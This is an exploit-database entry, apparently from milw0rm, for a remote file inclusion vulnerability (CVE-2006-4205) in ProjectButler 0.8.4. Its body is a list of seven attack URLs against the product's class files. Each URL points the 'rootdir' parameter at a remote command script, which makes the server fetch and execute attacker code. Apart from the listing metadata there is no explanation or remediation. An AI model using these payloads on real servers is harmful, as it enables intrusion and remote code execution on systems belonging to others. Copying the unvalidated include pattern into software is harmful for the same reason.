ProjectButler 0.8.4 - 'rootdir' Remote File Inclusion



EKU-ID: 10189 CVE: OSVDB-29475;CVE-2006-4205;OSVDB-29474;OSVDB-29473;OSVDB-29472;OSVDB-29471;OSVDB-29470;OSVDB-29469 OSVDB-ID:
Author: the master Published: 2006-08-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


########################################################################
#  projectbutler-0.8.4  Remote File Inclusion Vulnerability
#
#  Download: http://prdownloads.sourceforge.net/projectbutler/projectbutler-0.8.4.tar.gz?download
#
#  Found By: the master
#
########################################################################
#  exploit:
#
#  http://[Target]/[Path]/classes/Cache.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Customer.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Performance.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Project.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/Representative.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/User.class.php?rootdir=http://cmd.gif?
#  http://[Target]/[Path]/classes/common.php?rootdir=http://cmd.gif?
########################################################################

# milw0rm.com [2006-08-14]